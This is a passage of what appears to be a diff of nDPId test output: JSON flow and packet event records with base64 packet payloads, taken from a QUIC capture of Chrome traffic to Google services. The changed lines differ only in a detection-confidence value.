BVEhaIvowRgcn7\/v2zT1Ji\/TX8DeP9rZyEyPensHrqvCjEiXBVlBQXgUJKTAdm6SwnhUmgDIWfMcW2vD88XETNohXNP\/OdolyEZ2F5Okt1oR5HKmRMri3BoToqsELE6FkQG6EG4JyB3bG1wn7w7zqvTRpR1UjWxoXiXjFxffg92VsUmcwuEyMksgqkhRx9h0TWNRACL51r145yHnspstaxqMITdw034yIHhAL3G5uPbMdUZQJozU\/XLnjQ9V7x\/mbfIElAUaPrac3k2nvzbr5ENvEse2uDH9Q5NSX4CsOm399roi9AvuA4V7OYxCn6T1MdQz\/4\/J5eI8ez9zieLgXCZomN4Y+BUIAuOY5\/dWqfjZcWMx1s9NOKQTb1Ka9pe9XEJIuxx2s04cvGxtWZpPXA8fQ9IoJlumB17J64o1iwcDB9g1LshjWGo9lOe9FjTnwf2Uc7YISmWj+vyoFvYEhvt82NsOS0g1fbgE3nFxg5ojGIF4"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621492846202,"flow_last_seen":1621492846202,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492846202,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1621492846499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621492846499,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYNhAAH4RSxM0uxSvxPU9QM0gAbsFTsB+yP8AAB0IkN0D0fi2gP0AAEU0eNeT2iVrLMv4jKHl8TcBYgCovcfBUbyiMals1lo6OENtv3m3tzUH\/6BCYnVpY+CFN6iuhjAxK4TQo8fdrcWsTOaPpoFoY2L1biWlEbkp\/x6C0kavU\/xvEB03HgfSHvx9g2E9+0QVaZrnTGMDhzE\/LCMOi99ZyzUFTLa2whyStOHkacXjeP\/fXvaRIU8Xw0e1DmF+BBORNoKDNAzHaWe3Xdqk4sXMuKcYmcsPCiNzUfbIR5I4+VLDDbiRMHE4TjaiWP1s5tp2uFI3oH8oNBxSqcPF8N1QFN8Owg0bhCA\/IS6AAO+WjLvCXNFTIFRkUX2YOFCXkduhSQk\/oHwzaVML52Ssm10WvS1irnJ1a2h+SxJBrkoqZbSa3c8eawvV0lJSss8ZpdSbSRzoN2qRfRqNsLkutWp\/l\/cD\/9NStpmQaF3kKcyrILDL5C+ND+LRujNpqDaC7rufyYb4OxX88B0MzY74bKzBpjdNd\/NyrBm8\/onpNwjnCW96RXgIjm5ELYRH09jAdke\/LMSfgsn6fc0lbvgEQ3PiOAd21XyPj2OSsqeutdhHzHRboDg8Pn60e3mxTSQEysOZhCJu1aVdB2yGnhlHsTGM58d5JBHDE+jZDUbC06OdcJVkIv6bjuXRCqEL93W8VuYBHzKsU8Ii7A0JxSjAutjZgwMCd45KPWDsNutDQ87CFhmk5RA+fKc3pBM8cKLyE1\/D7NJxJr4GJrA53oLs7VGf6MKmlV4AsJZP6rx2xmCFhjFqHYFLBgJdnESGthy0GqSMdwYEYdqxlsQZidXrJUgJhUv\/viqRmaGGOIoeCbGdNL22EJ90SNuuCvVNhxjf+OCfozoA65mZFx5Us+WOLW813xAA7oS3jfz2r9ButsPWkueyotS4sGWbX+O7pcBxmbUlkuDeWzly\/JrdnbLf8o5IpZlL\/szeGX\/xaukbonKpw0kk35eQAFT22V0SvOQXn506i1bIeQVC6wqNBPKsgTo\/VPQcaj1aZ1Q17VqXoKPIuPlZ7SMkngAYC6FlUWvgpdcoeIcZ\/t2glrET\/TpZTHAx1vcYpwXGccxvCqJvFzp\/iEy\/P0\/s2VTVERM98qgpyC8vVMDiAXeT0c+8myMBJWMmEBB7+3YFzgV0RnhI5XMWiTiedHwgemVCeDU1kg8u8hqfknKqaVcO5tLH9t2FGmiCSrVi\/CAOeu\/vnWqt9L\/E7AUvgJ3nf\/XofTNim4vFwMW9qWfnflBAI4etDSLXlfhCF6hj05LkXpBYnhDX04dMfzMd0wbqUALjlqng3G22KPNXzcoLHgLHkSRTNkeGoexq9oBLHV6OhHb4pIzLS3SlHBQgMv0ujiz0C3WRmVVFITqTC4Ym0lFLd1XdXKIywfzJUvwG8AxVCpiWvvbn0MsvomTXCjNPteZVCsije7Ys2XOj4jFIoymLHdB7GeVOyHHeUAXfmy7fXXhR9EIO7It7pUitHoj7\/O+uPlKz4WGY1XtA5gadBlJ9hcfv1AISORgb2SzImOEaEIs1Oyben4xhUAxtnihkj2tOYt66nHUJoi6WDXV0pSiA1adbER0DGTh61m1GbsvAF6iehNm5R\/auq3cSwz\/oNuoEeWcajKe6C+bJZ0Pp4ODEB6xylysFi5Nsg\/X3yxwOUBMebO7HFdoJOx6\/anLHqvZoeJiNuEm3J93g5x\/1Nsu9QNYOSXc3CITQMMVtVZsPeOQpBypby+hqNIrDBvXDcv86XBheVQLni22zPRHvnPPVc9m1STaKuBI1rOewM0zxJ7Y1kebQ5fFy"} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1621492847100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621492847100,"pkt":"AAAAAAAAAAQAl2dmCABFAAViYNlAAH4RSxI0uxSvxPU9QM0gAbsFTuvFzP8AAB0IkN0D0fi2gP0AAEU06G6NT+VSCrmEO3BKTHqGvRDj7zHVCi94TyNRWxU1mXbjbTRFZ+CaZvg4gqUf9xMHAUYdMHn0JKiRgnSgkHznaTtiRgEk22fQwgIxVH+hvtVpbaIsb3bOri0\/NzM4wzGQk0hhFXdooXMc+tmV57mVI8vF9JmkYZ3AY2F8JLlv1BxIxapiJTD7gwuZ9nIypLmrrtiyGXxIl88PM6uDd1lRl3qoQ0oiA9c6pPTCRB8dAQJ4YYuVmuW5TbhruKDZ8PB0MJQOb013X2nAghH9Hwha3CvwiU2omtgMvjkZesxfUObKfDTbFEMzL\/jrRFh\/+J0F\/EGuyjhTpDu6+xG8itbCbnAQOy7WuW5TYEsc0xXOAoc6KlEwmQiQKfPKtF\/2CZ9SjafQf4Oy5m1SaS8su+ueaSjJsX7m0K38THdf5jQ\/Fl4bTD67mwBO+f0scmP6GL\/mbPaoaMUGAzlNUBiMCCExtPs8A0mmZK+0smBu+L2yDxhIAkqjH2OcdLR11dCH0QdOU\/qRLGN41DI\/\/cqIkx2ijbR9g+OiikFtGSy6n2LA3mBBdnd2T0hBdnX9fIo78omWMaICsidEwWQIYfSO+LyI2h4JvJoNJSJxTMpQux0CHDeflYgxqteaTQCHdOZSOAFozGJdqpUc4ukomNxsQCMV4GAyI75uC+kKJhbeM\/HEqnNyY0rfHOQrHusbMJJ7FCv6nM11\/2Oo1Hh2eJK88As7gRhqPVzeuz\/U\/xXz2EOtHRBBzR+oprpB0Uws8\/b54W5T+yFgV3JV567bJDHBaKHV4CypvviObj3VPZSDfbx8ZDE8cPozymxrQGwJnz\/SSVKg7yHHCcAhBIh9T7YzMsItriGNvgnX0urwJbHBIwvT0elkkqojq4KIx\/7Yh8uMFRpT07cYIl6MdN\/iCqwh1vqZbBwbGpfQR\/HAz4IypJz+zywRzPQmL4Zjd28OKKYaEI1VO6TnaZathnaIz0cGz41\/3ec6ubKFkmDYBvMaCkYbP938UlSyqwlkgR59+GTpwl2zVUb\/faKExO\/4NpJhLquIMi1hgHnj1b89iIzZEVRRmuruxSFJoxbfnenirV2KkIVM3rdYaAMxCt99+sRexO3VcGSAJA03hK\/5kyXvD1AEq19Fa4iw1nUrJXngE0gL+UwmRFL0ICfLh\/hdSEO2viit7tS9gNA4BJCujAoVC7fRr\/9\/osYAvWoTHo08WZH2WCiQAis7vlYiYCukAhDVyYp0qF36aPAJIVN4AZeZh\/UwxvSF7ScBTb4zd2qrmWQ\/QZp4LrWYepsYYrlR5PrdyOcgmPlz88MR+J+nuXlWXgCXcgNN1OrnHnxsLeZAZ66ipsvP1GZZJYJb3sLc9AcafS9torkCmsXvmQslIdm+okpX\/V\/b43ll6bHHGrpUQUv\/PNxOHHQOhXVrn7vat1ejZj90Ni6sGu+5HaMpi1OLD1mKP68o8RFXXDItYMsdIXHnUpqZjqKI3C+edj9oApTrZsLkp61Xxv6XiA96YE2VPsxN+ezAXexypGEJk04q7+rYgpGY24NJp4tAUHgsYUOjphIugzRYKjYfTmKFGPs84dxLcAVTKE13VQOFcTXkt62OXTrEtGBfQUWVDuQm\/p598jzYh96BGCH7WptCesorqdhDG\/2HxAPEOEo7SWItolevicv20QLakpWkPPm17h6hzM\/rWFNZM9vbByjMoWPhIUCyRXi\/CbuDLLXeA9rb9\/9+r7QoHKocX6ChoPNabp8O8SrguQ6Jwt8O7ZEnphGvVCAS+swijeKY"} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621490940042,"flow_last_seen":1621490941568,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621490996100,"flow_last_seen":1621490998210,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621490937698,"flow_last_seen":1621490938810,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621490940042,"flow_last_seen":1621490941568,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"121.209.126.161","src_port":63507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621490996100,"flow_last_seen":1621490998210,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621492848301,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"108.171.138.182","src_port":57066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-payload-len":143100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":70,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":70,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":321,"global_ts_msec":1621494599158} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1621494599158,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621494599158,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVlNAAH4R6ZY0uxSv0OWdUcmjAbsFTknBxv8AAB0IjEZZ7Twbo9wAAEU0kJjhzp3PFc23t3I6EGlw9Nw6Qc1SUTVOLXwfMjNoeRLiLBXl1p7gZhSviv9JQfR9Wlb4B\/LvGDs5HubqNvjy9gSGhUAoZKHgVyQNQ8sPeb+zAK4\/+3Qxk6DgExGf6DSCsV9UWtXpGmfgDVaGUIKvjlEvPlaJQ79FJEUNmnxqw+Su2z56GwGnZs3etUJY7Thex2ui8FvucKYZYvgu6wRjounSXDUxthqRvvbGPyVi+\/zvUh6JQJ+TX8SC4eFZqQp+jb7GmBSIOMm\/Ec1jvbOi\/aliVkt3gPEwixlo\/RAm9MQzPwfq70hgSkoJx46ldrVQcWlKc\/yvw3p2stokg4mvv0O\/AA2g32B4XP1S2bCDnPSyjwe\/FFG3OX0VFLRXvjekO4to1p9XPgmuVtwpQLf4lyNVfpdhvYlgoEwUjM9uaq3UiXNUhHqjQ0L4DXtkhhjRWeULrLkU0f0REry3Q\/LckyGikkZkv+F+HV9G2NIDV+IxZQ6OWB7DM0Z83epJzGFj5\/uYXKmk+BbONhvtUkbwsIoFVtH1Q4vZLc4nHVR23cDEhozshXDSC7PWSfxClKjneDPQdrDLr0vgsH8xBaaaTioZjwEVMdhbN8FsX\/rL6bMhM+b9iF41rToFIYIcSRksL0LulUfkhaEGqLUnpKwuyqlF5UpMMngzqdoYUpd0fzQgxA99TnPf\/ZibGXba4goUBq5aTeKljwjQvpfeDm0N71QVgSNFdU8sTF5RiM0jkfLo8VOjKRpirBNuYJ7DIAlvof3NA0Grn8dQ7f8YWlV1lHjXfjMeogHBB\/P2mTQzXX3ArnxmdG\/i2\/iEZexnqGBauYfcvUbCb4yWGyQ+uf4buf9Z9AyMQMsYl+B8ptpOp5x0NGkqHT26QYAV+A6a2HfCBCEg66zE4TRZrMqr6q6\/a\/IE2n6Yv2maemjmwg4iHbv195EUc9666Xw\/knVVZHK8GuAAgFkIfnCTuFvSaCEwbnOXJ3s++e1rXdNr+Hg0b2Zbi4Ef9DQNeQpBIh3Ur7TEj8IDc\/NOM35lp7oYr7QO2zj6YAWebmCqb56wXDDn5mBBgu37fQhnakjMV7jHPkryVTXnFiOaL\/CVFGTvS46bBvmJkLPq4HRzoYbmboqQx4mXB1LvgMfXrHU3l7iZLz\/2XPIqh+KYqtzkanEAs3nElKsp2sB5mExQqIIubK+l5dcRdQNfCBmPrColZiPglV6Hv5liYk8JJ8Kbi6iN9RFbJHoGR+dLu3tvqT\/dah4soYZhtI9JnUfTXwZhINQmrqt11PjUN5xy2FY4x7Hur7+46IjhG3mRUQfKZk31z3sThwR5xjbX16LSIZERlLjpMdpm+lcm2fcsmWRXoQTgM8\/ugnLqEQDMuUDGvRukyIwk88fRryMIRKV8KDVhw4+vJ2EZLvYDeRSBFQdsKzSa\/hTqJc1bTtpaEUuGT2u\/or12NqrqQU7wVWi3YOk1X+OSoNbRXciEI2LGKLRqsnbsAqS+IJRbeA+3y8sXStW3YAt1gPKq7Pgq5cW4+8O1NmIlJ6gz1+lq\/WisqZhapMN5rUgoylNO5YJPHuzHdkOWHinWJ52NWCXnOYekNmJLkh41YrSQvM7Zm1APRBCuH+h9RHttH1u+s9o2TQ4uAPAAFWi6bluDPG8hlbO7uz7OAKhhEJ239ij+NXPbweBE66DiURdi7Gj3kcjPg3OPsIP1L\/pUMzoKutj3ZBRiMec+XXaGz3s5ppe5ssD\/WW3cQpGois32lgVeJrDmpDxCsEoxF\/1Tdai7z0bd"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621494599158,"flow_last_seen":1621494599158,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494599158,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":51619,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1621494599466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621494599466,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVm9AAH4R6Xo0uxSv0OWdUcmjAbsFTojgyf8AAB0IjEZZ7Twbo9wAAEU001Nedh8jl0mRxcN7+5ymyAhdk9NMUwxYze3lIyYWk2jP0t92iE+L\/yAM4MnpE0YCo8Yj\/sG9IYL5\/Jqz+v0\/7PZJlA72+xIp\/Zz2FHFmfCsrXJBq8qMZr4yMJUaTQ79L\/KyQSvCHFBgMRJUhRKX69bPpnAnksqJirAlkiGBvT0YEt9mMoiR55EP1zkREk8I1QRdfacOBiC1xn5oSmyEOrHRGNMlEIFFRJLgWr0XXotnRIEGBlAPOKZPZzQapDug6\/9gRem0rTXsSVsMhbztxGw\/vtcuhxHhCL\/sRMBYP\/by5OhP3fCsCPd3sspB94dh0sVKqpEvWHKRXI5qkQ8i0KiE6NKXE1Nhqr1NvADQnhHZesnr3pbbwRzdVtIdnVbg+KpCF5NoQHX8ZH8QDyNjWRE1jnBpB6l3OJ1sSKdAgaiw8Ptd9k6AGoDKbmF4ICOpOWeyjIS5UuYgKNS4W1hKboP4A0l98z1AMF1cWHOyoMcwHulLBVCbBON1h3OyJxCb+qSsMMjsumD6d4H94KHLyQlTJDPLNq5+27EH4JgoPrQnrhU70QkhyDGeMEA08Y3NMvkMXs9ScL+i2jzv5BFhQo\/tMXR8AuhJIM9staI9B52\/FDML\/NHMdUhCiYzlzdj1bMiHMjmHtScQaruiH9wV2aP0flj8aUj5pRTOyuCcs7Yj8tosR5Q7Bc4J09A\/d7uBuSzN6SiWaOfxKRsQjRiB+PoBFp3RyZI15eo0FBDGFV9z7YaWXpK\/QUxQVAHHMQr6q2XYdo34fAYM5WCCSw55MSvIPkgf5o0DYE25dUpBH2wSkVcAbptZSsQKNwzN7dqVdVmsRhsSqNIVkr94Mgea0XDKOPfcuA0DHWVB2NpAqq\/2KIzHInDQ6qFc5M4nF4o54hvOuiL+GByVbEQt\/\/entGulu7X2JEiyqmYk92gVvJPNI8Bwemp05+Q+twxKscsRsU5w0Xn4LJ0aYLhTJviBC5fXR8Pc1viFBHXYXbarbLaQ3PMRows7y8XdeOl\/bsuCdG0ch6eIFsRvMMwjmhUgHj6ZC2WxikfNArVb9\/GqEMsVsVGaSerfdOb8LTsT5SWnrIpnMmWN2uIjFPgyu8\/qOno2piahKRLskEqrRUpNfLzBpNxlY9abVFtVrTQFSn+Bv0pyQSJS4S8yhl2CkBgItTkREH46KOs97E\/bHK\/yGj3NexQldO92K00H85joQ7nGUScRMKfqIpqXecJxSM6OAroxCymb3vSJmrnHwKgY0lo+ETPgqaXNxSMmLS\/2JsUVg9IcXwjmP\/hdzYDT4SjdN\/NCNzQLqEDcD8ycSm8xG+d2Pvjum+8NDSNcasGk4ZrSjQeckzYfCVt3NCKRhy2IHBlWjMTzzyU6DPzhIcLNpxSDWwl1i2IaHmb1isu27465MaWunzERUUlOR+kzIqaRHPTGq7D8F9Wz\/Lo9VOIM5KywiZogg8pDlQ7rw5vQ2wQF5TAz7WtDmtXKPT6M2TZLh0RCInRTlcWnKpFX\/38oEnnKrzaye2ifSAUvdyfSNZNXjY2UYGYg6Xrow72NLPTC9O\/+G9i89rbi0HpJcLFfEQxFMQ1sztsPWaTAohU5yyk90ga7gEn9IGLftr8nTGe13R6POb\/td5pOruFoWbUnJjSDEOgXIJWatBnyyLDn9kNeLMGnrjo17scXrhmlTzgSFpT8tsc+6WK+4OwCSK7uN2VYU5zw7G2oqvb\/XH2izKQLOvApMhxYFBkNigiUw+ruYaH6KQmSISbShAPpmf6e3Ok4EN\/1H"} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1621494600068,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621494600068,"pkt":"AAAAAAAAAAQAJ0huCABFAAViVq1AAH4R6Tw0uxSv0OWdUcmjAbsFTrvcyP8AAB0IjEZZ7Twbo9wAAEU0356vdnE85kFrnK9PnoN7N\/6cuhgJZOurPVLrUkSIEhjazS+SHD5nphYh\/Ei9oaiDY8Opbyw\/qBtRNMamhXjzOXvgznSeUsgwy1Y\/wE6Z8L\/PLMFoRidzgyIEn6rjIJKHwzzF2KGrVstlhyz2RTwgIvHMy9MIjilbgudOkuRl5cUCx4DqELWc9uRZ3o5vsRYtLfQcGLcZxuZNq+qR4l\/haEcF\/bo9RHUYHevsrmU3WGlZq2VVs06I2zfKkHonNVQotk1bro8ws9jUj7jyxUbwzWCdp3Y0J2vApeu9ELE8rutr0ZnW7RegpTFdI+\/pjDsy7w+XtT1RZkjL7KyYUDlQxQdEaIMNGHrAqXcCdWe\/PGc8CDZEYRQG4imIq3PmqUKfLT1H1z5PjAZqsks7C4eHUMCY+G0m1pwUNctiLiFN\/1UbsvMid1sQh6WBXSJiOYMPhFaj32vm6bQzmsW166O9cP+ju7nY2kDwHjX1VRLKHDBPT+BqIPgfQsjJdmUiCoPO1j6aSYQVgo0uGE74BSKhT3W7x1ONh6fXLzmN7+wWyuCCjfUqF68k4DNAO5ugG5nw7CpIh4otPJ3HMgytjz\/1hKjAQhcC4anVdWe0zLhoQLK+s1Pp+iUPac8alWHNwAjuYOUrtvLlDW5GtHXWtZeiHtJznZvOZ++hzVm33rcGcrUAJZx8UDtbZOWODHW2DvBPFPoCX6ZQVBXs9voksBXC+G9JF7eqoFmqO\/EH6soGSg6sF0snwdl4Tmbozt2\/yp4ye5MHCKh12GvgAGa\/SRfEXeWrk94V+VCNFH+5X7\/8EcicVy7uChM5zWex3QUxbJVdLP\/j5AI3XbgkHGGZyofmIhkZxWEV98Sv0kfttNMcxA841+aSpRVJN0a2XfeGieapwvw\/R6yETR9CN8TcQTFe6UQYPq7543m22E4Sg8mtjsfi7GhTVtBFlPk02hhEbcLmI3PLT100l2b\/h+mQABi\/RqHWxECe91tiAPUoarX+VKj0c3DqByummicCRPZ6kkW6whbXho2HsoAk+D7QoyjIYr\/kbmXT3ddi5XSAc3T\/AXjnmkbnhNKsXrqcM9kMdl18Kd80bmVHFpHplnIJlyzn8ksEEhjYfE\/gaufdnXnq1D3ABRKg2gQ